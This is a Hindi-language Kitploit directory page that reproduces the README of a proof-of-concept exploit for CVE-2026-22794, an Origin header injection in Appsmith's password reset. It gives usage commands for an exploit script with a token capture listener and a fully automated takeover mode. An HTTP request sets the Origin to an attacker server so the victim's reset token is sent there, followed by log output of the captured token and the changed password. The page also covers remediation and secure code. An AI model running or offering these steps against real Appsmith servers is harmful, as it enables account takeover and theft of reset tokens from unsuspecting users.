Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 - ओरिजिन हेडर इंजेक्शन के माध्यम से Appsmith पासवर्ड रीसेट खाता अधिग्रहण | PoC एक्सप्लॉइट + Nuclei टेम्पलेट | Kitploit
उपकरण/GitHubGitHub/malikhamza7/cve-2026-22794-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - ओरिजिन हेडर इंजेक्शन के माध्यम से Appsmith पासवर्ड रीसेट खाता अधिग्रहण | PoC एक्सप्लॉइट + Nuclei टेम्पलेट

रिपॉजिटरी देखें
787 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22794 - Appsmith Origin Header Injection

Python Version CVE License

🔴 गंभीर सुरक्षा भेद्यता

Origin हेडर हेरफेर के माध्यम से पासवर्ड रीसेट लिंक अपहरण

इस रिपॉजिटरी में CVE-2026-22794 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो Appsmith में एक गंभीर भेद्यता है जो हमलावरों को पासवर्ड रीसेट टोकन अपहरण करने और पूर्ण खाता अधिग्रहण प्राप्त करने की अनुमति देती है।

📋 भेद्यता सारांश

फ़ील्डमान
CVE IDCVE-2026-22794
प्रभावित सॉफ्टवेयरAppsmith (पैच से पहले के संस्करण)
भेद्यता प्रकारOrigin Header Injection
प्रभावपूर्ण खाता अधिग्रहण
CVSS स्कोर9.1 (गंभीर)
हमला वेक्टरनेटवर्क
हमला जटिलताकम
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताआवश्यक (पीड़ित लिंक पर क्लिक करता है)

🎯 भेद्यता विवरण

Appsmith पासवर्ड रीसेट और ईमेल सत्यापन URL बनाने के लिए बिना सत्यापन के HTTP Origin हेडर का उपयोग करता है। कमजोर कोड सीधे Origin हेडर को पासवर्ड रीसेट बेस URL पर असाइन करता है:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

यह एक हमलावर को अनुमति देता है:

  1. किसी भी ईमेल पते के लिए पासवर्ड रीसेट ट्रिगर करना
  2. हमलावर-नियंत्रित सर्वर की ओर इशारा करते हुए एक दुर्भावनापूर्ण Origin हेडर इंजेक्ट करना
  3. पीड़ित के लिंक पर क्लिक करने पर पासवर्ड रीसेट टोकन कैप्चर करना
  4. पीड़ित का पासवर्ड रीसेट करने और उनके खाते पर कब्जा करने के लिए टोकन का उपयोग करना

🔥 हमला श्रृंखला

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     ATTACK FLOW                                  │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ATTACKER │                    │ APPSMITH │                    │  VICTIM  │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Send email with            │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. Victim clicks link         │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Token captured!            │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. ACCOUNT TAKEOVER! ✓        │                               │
       │                               │                               │

📦 स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

🚀 उपयोग

जाँचें कि लक्ष्य कमजोर है या नहीं

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

टोकन कैप्चर सर्वर शुरू करें

root@kitploit:~
python exploit.py --listen --port 8080

दुर्भावनापूर्ण पासवर्ड रीसेट अनुरोध भेजें

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

पूर्ण स्वचालित हमला

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

पासवर्ड रीसेट करने के लिए कैप्चर किए गए टोकन का उपयोग करें

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 हमला प्रदर्शन

चरण 1: हमलावर दुर्भावनापूर्ण अनुरोध भेजता है

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

चरण 2: पीड़ित को दुर्भावनापूर्ण लिंक वाला ईमेल प्राप्त होता है

root@kitploit:~
Password Reset Link: https://attacker-server.com/user/resetPassword?token=abc123xyz...

चरण 3: हमलावर टोकन कैप्चर करता है

root@kitploit:~
[+] INCOMING REQUEST CAPTURED!
[*] Path: /user/resetPassword?token=abc123xyz789...
[!!!] PASSWORD RESET TOKEN CAPTURED!
[!!!] Token: abc123xyz789...

चरण 4: खाता अधिग्रहण

root@kitploit:~
[+] ACCOUNT TAKEOVER SUCCESSFUL!
[+] Password has been reset to: NewP@ssw0rd!

🛡️ उपचार

Appsmith का उपयोग करने वाले संगठनों को चाहिए:

  1. तुरंत अपडेट करें नवीनतम पैच किए गए संस्करण में
  2. Origin हेडर सत्यापित करें अनुमत डोमेन की व्हाइटलिस्ट के विरुद्ध
  3. पासवर्ड रीसेट URL उत्पन्न करने के लिए सर्वर-साइड कॉन्फ़िगरेशन का उपयोग करें
  4. अतिरिक्त सत्यापन लागू करें (जैसे, IP सत्यापन, छोटी टोकन समाप्ति)

सुरक्षित कोड उदाहरण

root@kitploit:~
// ❌ कमजोर कोड
userPasswordDTO.setBaseUrl(originHeader);

// ✅ सुरक्षित कोड
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// या व्हाइटलिस्ट के विरुद्ध सत्यापित करें
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 रिपॉजिटरी संरचना

root@kitploit:~
CVE-2026-22794/
├── README.md           # यह फ़ाइल
├── exploit.py          # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── requirements.txt    # Python निर्भरताएँ
├── LICENSE             # MIT लाइसेंस
└── docs/
    └── technical_analysis.md  # विस्तृत भेद्यता विश्लेषण

⚠️ कानूनी अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

  • इस टूल का उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
  • लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है
  • हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

📄 संदर्भ

  • CVE-2026-22794
  • OWASP - Forgot Password Cheat Sheet
  • CWE-346: Origin Validation Error

👤 लेखक

सुरक्षा शोधकर्ता

  • GitHub: @MalikHamza7
  • LinkedIn: आपकी LinkedIn प्रोफ़ाइल

📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


⭐ यदि आपको यह उपयोगी लगा, तो कृपया रिपॉजिटरी को स्टार करें! ⭐

टूल डाउनलोड करें